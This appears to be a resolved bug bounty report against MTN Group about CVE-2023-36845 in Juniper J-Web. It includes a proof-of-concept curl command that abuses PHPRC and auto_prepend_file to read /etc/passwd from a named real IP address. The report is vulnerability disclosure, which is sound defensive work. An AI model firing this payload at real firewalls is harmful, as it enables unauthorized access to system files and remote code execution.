Remote code execution [CVE-2023-36845]
Critical
M
MTN Group
Submitted None
Actions:
Reported by
m4lc0lmx
Vulnerability Details
Technical details and impact analysis
### CVE-2023-36845
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify a certain PHP environment variable leading to partial loss of integrity,
## POC :
with curl
41.205.30.222 = host-41.205.30.222.mtn.cm
```
curl -sk "https://41.205.30.222/?PHPRC=/dev/fd/0" -X POST -d 'auto_prepend_file="/etc/passwd"'
```
{F2727487}
## Impact
CVE-2023-36845 that allows an unauthenticated and remote attacker to execute arbitrary code on Juniper firewalls without creating a file on the system.
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2023-36845
CRITICAL
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection …
Report Details
Additional information and metadata
State
Closed
Substate
Resolved